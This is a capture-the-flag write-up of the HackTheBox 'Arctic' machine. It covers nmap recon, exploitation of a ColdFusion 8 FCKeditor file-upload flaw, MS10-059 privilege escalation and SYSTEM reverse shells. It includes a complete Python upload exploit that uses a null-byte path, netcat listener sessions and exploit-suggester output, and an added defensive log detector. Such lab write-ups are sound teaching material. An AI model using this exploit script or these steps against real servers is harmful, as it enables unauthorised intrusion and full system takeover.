┌──(kali㉿kali)-[~/…/Artic/recon/10.10.10.11/nmap]
└─$ cat Basic_10.10.10.11.nmap
# Nmap 7.91 scan initiated Tue Jan 26 00:15:51 2021 as: nmap -Pn -sCV -p135,8500,49154 -oN nmap/Basic_10.10.10.11.nmap 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.18s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 26 00:18:11 2021 -- 1 IP address (1 host up) scanned in 140.47 seconds

┌──(kali㉿kali)-[~/…/Artic/recon/10.10.10.11/nmap]
└─$ cat Quick_10.10.10.11.nmap
# Nmap 7.91 scan initiated Tue Jan 26 00:15:36 2021 as: nmap -Pn -T4 --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit --open -oN nmap/Quick_10.10.10.11.nmap 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.18s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

# Nmap done at Tue Jan 26 00:15:50 2021 -- 1 IP address (1 host up) scanned in 13.99 seconds
MSRPC is listening on port 135, something nmap labels fmtp (Flight Message Transfer Protocol) is on port 8500, and an unidentified service is on port 49154.
This is the first time I have come across the fmtp protocol. Checking it out.
Port 8500 is actually Adobe ColdFusion 8. Again, seeing this for the first time.
Checking for known vulnerabilities, I found a gem in the HackTheBox forum.
Exploit
There is a file upload vulnerability in ColdFusion 8. The above script allows me to upload a JSP file into the /userfiles/file/ directory.
Creating a JSP reverse shell, sending it to the server, and running a listener on port 443.
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.11] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5
┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/win-exp-suggester]
└─$ ./windows-exploit-suggester.py --database 2021-02-15-mssb.xls --systeminfo systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

There are multiple methods to do PrivEsc here. I have tried all of them, but only one works: MS10-059. There is already a compiled version in the exploit directory, but that didn't work. Found another compiled binary from egre55. This works!
Let’s move to the actual method I followed.
The file upload vuln got me thinking: if I can change the file type to binary in the file upload script, then a binary can be sent to the host using the same method.
Changing the MIME type to application/octet-stream in the FileUpload script, plus a couple of other tweaks, allows us to upload binary files.
import sys
import requests

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        path = sys.argv[3]
        with open(sys.argv[4], 'rb') as payload:  # binary mode: read the .exe byte for byte
            body = payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'rb') as payload:
            body = payload.read()
except IndexError:
    print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.exe>'
    print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.exe'
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print 'Sending payload...'

try:
    # MIME type set to application/octet-stream so the binary body is accepted as-is
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploits.exe%00",
                        files={'newfile': ('exploit.txt', body, 'application/octet-stream')},
                        timeout=30)
    if req.status_code == 200:
        print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/exploits.exe'
    else:
        print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
    print 'Failed to upload payload... Request timed out'
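As an added defender-side example (not part of the original write-up or of the upload script above): a small Python 3 detector that runs over constructed access-log lines and flags the same pattern, requests to the FCKeditor connector path whose CurrentFolder carries a NUL byte or an executable name, plus executables later served from /userfiles/. The log format, sample lines and alert names are my assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (common log format); not from the original post.
SAMPLE_LOG = """\
10.10.14.15 - - [26/Jan/2021:00:20:01 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploits.exe%00 HTTP/1.1" 200 512
10.10.14.15 - - [26/Jan/2021:00:20:05 +0000] "GET /userfiles/file/exploits.exe HTTP/1.1" 200 73802
192.0.2.7 - - [26/Jan/2021:00:21:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 4096
192.0.2.9 - - [26/Jan/2021:00:22:00 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+)')
# FCKeditor connector path shipped with ColdFusion 8 (compared case-insensitively)
CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/"
# Extensions that should never be written to, or served from, the upload folder
EXEC_EXT = (".jsp", ".cfm", ".exe", ".bat", ".dll")


def classify(line):
    """Return the alert names raised by one log line (empty list if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    alerts = []
    url = urlparse(m["url"])
    path = url.path.lower()
    if path.startswith(CONNECTOR):
        alerts.append("fckeditor_connector_access")
        # parse_qs percent-decodes, so %00 arrives here as a real NUL byte
        folder = parse_qs(url.query).get("CurrentFolder", [""])[0]
        if "\x00" in folder:
            alerts.append("null_byte_in_currentfolder")
        # the name a NUL-truncating file API would actually see
        if folder.split("\x00", 1)[0].lower().endswith(EXEC_EXT):
            alerts.append("executable_name_in_currentfolder")
    if path.startswith("/userfiles/") and path.endswith(EXEC_EXT):
        alerts.append("executable_served_from_userfiles")
    return alerts


def scan(log_text):
    """Map (client ip, request url) to its alerts for every flagged line."""
    hits = {}
    for line in log_text.splitlines():
        alerts = classify(line)
        if alerts:
            m = LOG_RE.match(line)
            hits[(m["ip"], m["url"])] = alerts
    return hits
```

Plain connector access on its own is only a low-severity signal; the NUL byte and executable extension alerts are the ones worth paging on.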
Trying it out!
┌──(kali㉿kali)-[~/HackTheBox/Artic/exploit]
└─$ python FileUpload.py 10.10.10.11 8500 Chimichurri.exe
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploits.exe
The file is stored in the C:\ColdFusion8\wwwroot\userfiles\file directory. Running the exploit with the IP and port of my local system as arguments gives a reverse shell with root (SYSTEM) access.
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 53                                                  1 ⨯
[sudo] password for kali:
listening on [any] 53 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.11] 49201
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\wwwroot\userfiles\file>whoami
whoami
nt authority\system

C:\ColdFusion8\wwwroot\userfiles\file>cd C:\
cd C:\

C:\>cd Users\Administrator\Desktop
cd Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt